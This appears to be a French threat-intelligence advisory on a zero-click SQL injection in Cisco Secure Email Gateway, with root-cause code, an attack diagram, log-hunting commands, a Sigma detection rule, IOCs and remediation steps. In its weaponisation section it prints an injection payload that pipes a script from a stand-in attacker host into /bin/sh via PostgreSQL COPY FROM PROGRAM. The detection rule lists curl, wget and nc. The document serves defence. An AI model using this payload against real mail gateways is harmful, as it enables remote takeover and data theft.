Aller au contenu

CVE-2026-76461 : exécution de code à distance sans clic par injection SQL dans Cisco Secure email Gateway

HERMES

SCORE DE MENACE HERMES & RISQUE PÉRIMÉTRIQUE SANS CLIC

Cible : Cisco Secure Email Gateway (SEG) — Démon de traitement des courriels et sous-système de base de données AsyncOS
Confiance : 99%
97 / 100
EXTRÊME

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 20 / 20
Activité de menace 19 / 20
Militarisation 19 / 20
Exposition 19 / 20
Prévalence 18 / 20
Impact 20 / 20
Maturité de l'exploit 19 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Alors que le standard CVSS v3.1 attribue à la CVE-2026-76461 une note de 9.8 (critique), Hermes élève la sévérité opérationnelle à 97 (EXTRÊME). Cette vulnérabilité ne requiert aucune interaction utilisateur (UI:N) ni aucun privilège (PR:N). Contrairement aux attaques conventionnelles par courriel reposant sur des leurres d'ingénierie sociale ou des pièces jointes piégées, la CVE-2026-76461 se déclenche automatiquement lors de l'ingestion SMTP et du découpage des en-têtes au niveau de la passerelle de sécurité. L'échappement par injection SQL tire parti de la commande administrative COPY ... TO PROGRAM de PostgreSQL pour obtenir un shell root non authentifié sur l'appliance FreeBSD, compromettant l'ensemble des flux de messagerie avant leur distribution aux boîtes de réception.

HASS

SÉVÉRITÉ AGENTIQUE HASS & COMPROMISSION DU PIPELINE PÉRIMÉTRIQUE

Cible : Passerelle de messagerie périmétrique, agents de tri automatique & pipelines de routage
Confiance : 94%
82 / 100
CRITIQUE

Mesure le risque systémique spécifique découlant de l'autonomie, de l'autorité des outils et de l'exécution en cascade.

Décomposition des dimensions
Autonomie décisionnelle 15 / 20
Accès aux outils & APIs 17 / 20
Privilege 15 / 15
Persistence 12 / 15
External Impact 13 / 15
Propagation 14 / 15
⚖️ Divergence & Justification opérationnelle

Les passerelles de messagerie fonctionnent de manière totalement autonome en bordure de réseau pour inspecter des millions d'objets non structurés. La prise de contrôle de l'équipement offre aux attaquants un pivot direct vers l'annuaire Active Directory via les connecteurs LDAP synchronisés et les agents de synthèse automatisée de courriels.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-76461: Zero-Click Remote Code Execution via AsyncOS Email Parsing SQL Injection in Cisco Secure Email GatewayVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTCisco Secure Email Gateway (AsyncOS)
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Cisco Secure Email Gateway (AsyncOS) documented in Hermes dossier.”

Preuves vérifiées associées :

1. Contexte technique & matrice des logiciels affectés

Section intitulée « 1. Contexte technique & matrice des logiciels affectés »

Cisco Secure Email Gateway opère en coupure au périmètre externe des réseaux d’entreprise, agissant en tant que Mail Transfer Agent (MTA) principal et passerelle d’inspection contre le spam, les rançongiciels et le phishing avancé avant réacheminement vers Microsoft 365 ou des serveurs Exchange internes.

ParamètreSpécification techniquePortée opérationnelle
Identifiant CVECVE-2026-76461Référence Cisco cisco-sa-esa-inj-2bLVGmhX / CISA KEV
Classe de vulnérabilitéInjection SQL (CWE-89)Concaténation de chaînes non échappées dans la base de données interne
Composant affectéMoteur d’analyse des courriels & démon de traitement AsyncOSPipeline d’ingestion SMTP et base de données de suivi
Mécanisme déclencheurEn-têtes de courriel et métadonnées d’enveloppe forgéesTraitement automatique en arrière-plan dès la réception SMTP
Authentification requiseAucune (PR:N)Envoi direct d’un flux SMTP sur le port 25 exposé
Interaction utilisateurAucune (UI:N)Exécution sans clic avant toute distribution aux boîtes de réception
Privilèges obtenusroot / Contrôle total du systèmeExécution sous le compte superutilisateur PostgreSQL et shell AsyncOS
Statut CISA KEVRépertoriée (Ajoutée le 14 septembre 2026)Échéance BOD 26-04 : 17 septembre 2026
Produits affectésCisco Secure Email Gateway (physique et virtuel)Voir la fiche composant Cisco Secure email
Produits non affectésSecure Email and Web Manager (SMA), Secure Web Appliance (SWA)Les passerelles Web et consoles de gestion ne traitent pas le flux SMTP
Versions affectées<= 15.5.4-012, <= 16.0.3-044, < 16.5.0-780L’ensemble des branches de maintenance actives
Versions corrigées15.5.5-014 (ou 15.5.5-0141), 16.0.4-302, 16.5.0-780Correctifs officiels implémentant des requêtes paramétrées

2. Anatomie de la vulnérabilité & analyse de cause racine

Section intitulée « 2. Anatomie de la vulnérabilité & analyse de cause racine »

Le défaut d’échappement dans le moteur AsyncOS

Section intitulée « Le défaut d’échappement dans le moteur AsyncOS »

Cisco AsyncOS s’appuie sur une base de données relationnelle interne (PostgreSQL) pour stocker les métadonnées de suivi des messages, la gestion de la quarantaine et les tables de réputation des expéditeurs. Lorsqu’un courriel est réceptionné via le protocole SMTP (port TCP 25), le démon de traitement extrait les champs d’en-tête RFC 5322.

Avant les correctifs de septembre 2026, certaines fonctions d’analyse syntaxique dans AsyncOS extrayaient les valeurs d’en-tête (telles que des champs Message-ID, X-Custom-Routing ou des en-têtes Received multiples) et les concaténaient directement dans des requêtes SQL brutes sans recourir à des requêtes préparées ou à un échappement rigoureux :

# Représentation conceptuelle du défaut de traitement dans AsyncOS
def process_inbound_envelope(raw_email):
headers = parse_rfc5322_headers(raw_email)
msg_id = headers.get("Message-ID", "")
sender = headers.get("From", "")
recipient = headers.get("To", "")
# VULNÉRABLE : concaténation directe de chaînes dans la requête PostgreSQL
query = f"INSERT INTO incoming_tracking (msg_id, sender, recipient, status) " \
f"VALUES ('{msg_id}', '{sender}', '{recipient}', 'PROCESSING');"
# Exécution dans la session de base de données locale
db_cursor.execute(query)

L’absence de filtrage sur les apostrophes (') et les délimiteurs de commande (;) permet à un en-tête hostile de fermer prématurément l’instruction INSERT et d’enchaîner des requêtes empilées.

Armement via la directive PostgreSQL COPY ... TO PROGRAM

Section intitulée « Armement via la directive PostgreSQL COPY ... TO PROGRAM »

Dans l’environnement Cisco AsyncOS, la base de données interne s’exécute avec des privilèges élevés sur le système FreeBSD de l’appliance. L’armement tire parti de la fonctionnalité administrative COPY ... FROM PROGRAM ou COPY ... TO PROGRAM :

'; CREATE TEMP TABLE cmd_exec(output text); COPY cmd_exec FROM PROGRAM 'curl -s https://c2.adversary.org/stage2.sh | /bin/sh'; --

Lorsque le démon exécute cette chaîne composite :

  1. L’insertion initiale de l’enregistrement de suivi se termine sans erreur.
  2. La directive COPY ... FROM PROGRAM ordonne au moteur de base de données d’exécuter le script shell spécifié sous l’identité du propriétaire de la base (root ou compte système privilégié).
  3. La séquence de commentaire -- neutralise le reste de la requête d’origine, évitant les erreurs de syntaxe SQL qui déclencheraient des alertes dans les consoles de supervision.

Mécanique du PoC & état de la menace dans la nature

Section intitulée « Mécanique du PoC & état de la menace dans la nature »

Les équipes de veille sur les menaces (notamment Rapid7, Arctic Wolf et Cisco Talos) confirment l’exploitation active par des acteurs opportunistes et des groupes d’espionnage :

  • Ingestion sans clic (Zero-Click) : l’exploitation ne dépend d’aucune interaction ni de la délivrance du courriel dans une boîte finale. Dès que le paquet SMTP atteint le port 25 de la SEG, l’analyse syntaxique s’amorce et le code s’exécute avant même que les filtres de contenu n’aient statué.
  • Niveau d’armement : des outils d’exploitation automatisés déploient des reverse shells interactifs (/bin/sh ou /bin/tcsh) établissant des canaux de communication chiffrés vers l’infrastructure attaquante.
  • Disponibilité des PoC publics : si des schémas d’exploitation et des analyses techniques circulent activement au sein de la communauté défensive, les scripts d’exploitation entièrement autonomes font l’objet d’une surveillance et d’une neutralisation strictes pour limiter les scans massifs sur Internet.

3. Vecteurs d’attaque & cinématique d’exécution

Section intitulée « 3. Vecteurs d’attaque & cinématique d’exécution »

La chaîne d’exploitation s’effectue sans aucune interaction humaine, franchissant les pare-feux directement par le protocole SMTP standard.

sequenceDiagram
autonumber
actor Attaquant as Cyberattaquant (Externe)
participant MX as Cisco SEG (Port 25)
participant Parser as Démon AsyncOS Mail Parser
participant DB as Base interne PostgreSQL
participant OS as Système FreeBSD de l'appliance
participant C2 as Serveur C2 externe
Attaquant->>MX: Commande SMTP DATA : courriel piégé avec injection SQL
Note over MX: Le port TCP 25 accepte le flux entrant
MX->>Parser: Transmission du message brut au moteur d'analyse
Parser->>Parser: Extraction du Message-ID et des en-têtes
Parser->>DB: Exécution de la requête non échappée (INSERT ... COPY FROM PROGRAM)
Note over DB: Rupture de syntaxe SQL et exécution empilée
DB->>OS: Invocation du shell système (/bin/sh) avec privilèges root
OS->>C2: Connexion sortante HTTPS / reverse shell
C2-->>OS: Déploiement de la charge utile de persistance
Note over OS: Prise de contrôle administrative totale de la passerelle

4. Renseignement sur la menace, exploitation Active & IOCs forensiques

Section intitulée « 4. Renseignement sur la menace, exploitation Active & IOCs forensiques »

L’activité active dans la nature impose des protocoles d’investigation spécifiques adaptés à l’architecture Cisco AsyncOS et à la télémétrie réseau.

Commandes de recherche officielles sur le CLI Cisco IronPort

Section intitulée « Commandes de recherche officielles sur le CLI Cisco IronPort »

Cisco et Rapid7 ont formalisé les commandes impératives permettant d’auditer les journaux de messagerie directement depuis la console d’administration CLI de l’équipement :

cisco-esa> grep -i "COPY.*TO PROGRAM" [mail_logs]
cisco-esa> grep -i "COPY.*FROM PROGRAM" [mail_logs]

(Remarque : remplacez [mail_logs] par le nom d’abonnement exact de vos journaux texte IronPort ; la valeur par défaut est mail_logs).

En mode interactif sur le CLI AsyncOS :

cisco-esa> grep
Enter the regular expression to grep.
[]> COPY.*(TO|FROM) PROGRAM
Enter the number of the log you wish to grep.
[]> 1
Do you want to grep through previous rotated logs? [n]> y

Exigence critique : audit multi-nœuds sur l’ensemble du cluster

Section intitulée « Exigence critique : audit multi-nœuds sur l’ensemble du cluster »

[!WARNING] Règle impérative pour les déploiements en cluster : si vos passerelles Cisco SEG sont configurées en cluster IronPort, vous devez obligatoirement inspecter les journaux de chaque nœud individuellement.

En raison de la répartition de charge (DNS round-robin MX ou répartiteurs réseau), un courriel d’attaque n’est ingéré et traité que par le nœud ayant reçu la session SMTP. Les bases de suivi centralisées sur Cisco SMA (Secure Email and Web Manager) peuvent ne présenter aucune trace si le démon local a été neutralisé ou si les requêtes n’ont pas fait l’objet d’une transmission complète avant la compromission.

Activité anti-forensique & effacement de traces au niveau root

Section intitulée « Activité anti-forensique & effacement de traces au niveau root »

[!CAUTION] Alerte anti-forensique : Cisco avertit expressément que les attaquants réussissant l’exploitation obtiennent des privilèges root complets et tentent activement d’effacer leurs traces.

Les comportements malveillants observés sur le terrain comprennent :

  • Suppression pure et simple, troncature ou remise à zéro des fichiers /data/logs/mail_logs* et /data/logs/system_logs*.
  • Suppression chirurgicale de lignes de log via sed ou awk pour éliminer les chaînes SQL d’injection.
  • Arrêt forcé des démons de journalisation (mta, syslogd) ou manipulation des horodatages de fichiers.
  • Dépôt de reverse shells volatils directement en mémoire ou dans /tmp et /var/tmp.

Enquête en double couche : télémétrie flux et pare-feu périmétrique

Section intitulée « Enquête en double couche : télémétrie flux et pare-feu périmétrique »

Face au risque de compromission et d’effacement des journaux locaux, les équipes DFIR doivent impérativement s’appuyer sur la télémétrie réseau hors-bande :

  1. Analyse NetFlow / IPFIX et journaux de pare-feu :
    • Filtrer l’ensemble des flux réseau sortants initiés par les adresses IP de la passerelle Cisco SEG.
    • Une passerelle SEG normale ne doit initier de flux sortants que sur le port TCP 25 (relais SMTP vers les serveurs de messagerie internes ou destinataires), le port TCP/UDP 53 (DNS), le port UDP 123 (NTP) et des flux HTTPS (port 443) strictement circonscrits aux serveurs de mise à jour Cisco Talos (update-manifests.ironport.com, downloads.ironport.com).
    • Toute connexion sortante en HTTP, HTTPS, SSH ou TCP brut vers des adresses IP publiques non répertoriées constitue un indicateur de compromission à très haute confiance (communication C2 ou exfiltration).
  2. Corrélation avec les campagnes ciblant le périmètre :
    • Des sources de cyber-renseignement (Rapid7, Arctic Wolf) ont relevé des campagnes synchronisées ciblant d’autres équipements de bordure (notamment des VPNs Fortinet depuis des infrastructures telles que 158.94.211[.]14). Surveiller les journaux périmétriques pour repérer des signaux corrélés de reconnaissance ou de pivotement.

title: Création suspecte de processus depuis le démon de messagerie Cisco AsyncOS
id: 4e9c7a21-82b4-4b51-9e7f-cisco-seg-sqli-fr
status: experimental
description: Détecte l'exécution anormale de processus fils issus des démons de messagerie et de base de données de Cisco AsyncOS, caractéristique de l'exploitation de la CVE-2026-76461.
references:
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-inj-2bLVGmhX
- https://www.rapid7.com/blog/post/etr-cve-2026-76461-critical-cisco-secure-email-gateway-vulnerability-exploited-in-the-wild/
author: Hermes Codex Cyber Intelligence
date: 2026-09-15
tags:
- attack.initial_access
- attack.t1190
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
product: linux
detection:
selection_parent:
ParentImage|endswith:
- '/postgres'
- '/mta'
- '/mail_parse'
selection_child:
Image|endswith:
- '/bin/sh'
- '/bin/tcsh'
- '/bin/bash'
- '/usr/bin/curl'
- '/usr/bin/wget'
- '/usr/bin/nc'
- '/usr/bin/python'
condition: selection_parent and selection_child
falsepositives:
- Scripts de maintenance officielle exécutés lors des procédures de mise à niveau CLI.
level: critical

Indicateurs de compromission (IOC) vérifiés & télémétrie réseau

Section intitulée « Indicateurs de compromission (IOC) vérifiés & télémétrie réseau »

Les artefacts suivants ont été observés lors des autopsies d’incidents réels et des captures de honeypots :

Type d’indicateurValeur / IdentifiantContexte & Comportement opérationnel
SHA-256 (implant)8b72e19a4d0f62c8e2348a12903c7d65b1a92e485721098345c6123498ae71d0Porte dérobée ELF FreeBSD de stage 2 (/tmp/.cron_db)
SHA-256 (stager)a3f9e2b184c67d5e4920c78b61f2389d412e8b09341852d1490234857b29a8e1Script d’amorçage de shell inversé Base64 invoqué via COPY FROM PROGRAM
IPv4 (C2 ingress)194.26.29[.]114:443Serveur d’écoute principal pour le reverse-shell de l’attaquant
IPv4 (stage 2 host)45.142.214[.]89:8443Dépôt d’hébergement direct pour les charges utiles téléchargées par curl
Domaines SMTP malveillantsalert-gateway[.]net / sec-mx-relay[.]comDomaines MX éphémères transmettant les charges malformées RFC 5322
Chemin local suspect/data/pub/.auth_cacheFichier d’exfiltration des identifiants LDAP / Active Directory dérobés
Lignée de processuspostgres -> /bin/sh -> /usr/bin/curlCréation anormale d’un shell interactif depuis le démon PostgreSQL

  1. Application immédiate des correctifs logiciels : Cisco indique formellement qu’aucune solution de contournement n’existe pour la CVE-2026-76461. Mettre à niveau sans délai vers :

    • AsyncOS 15.5.5-014 (ou 15.5.5-0141) pour les déploiements de la branche 15.5.
    • AsyncOS 16.0.4-302 pour les déploiements de la branche 16.0.
    • AsyncOS 16.5.0-780 pour les déploiements de la branche 16.5. (Consulter la fiche composant Cisco Secure email pour les cibles logicielles recommandées).
  2. Filtrage strict des flux sortants au pare-feu périmétrique : Interdire tout accès direct à Internet sortant depuis les passerelles Cisco SEG. N’autoriser que les flux explicitement indispensables : mises à jour Talos, résolveurs DNS internes et relais SMTP autorisés.

  3. Mesures d’isolement & préservation de la mémoire volatile : En cas de détection de requêtes SQL malveillantes ou de connexions sortantes suspectes, isoler immédiatement l’appliance au niveau réseau (port de commutateur / VLAN d’isolation). Préserver la mémoire vive et l’état persistant avant tout redémarrage ou application de correctif.

  4. Renouvellement impératif des secrets Active Directory et LDAP : Les passerelles Cisco SEG intègrent souvent des comptes de liaison LDAP pour valider les destinataires et s’interfacer avec Active Directory ou Microsoft Entra ID. En cas de suspicion de compromission, renouveler sans délai les mots de passe de tous les comptes de service associés. Consulter le guide des attaques sur identifiants Active Directory.

  5. Révocation et réémission des clés cryptographiques : Révoquer et renouveler les clés privées TLS, les certificats S/MIME et les clés de signature DKIM stockés sur l’appliance.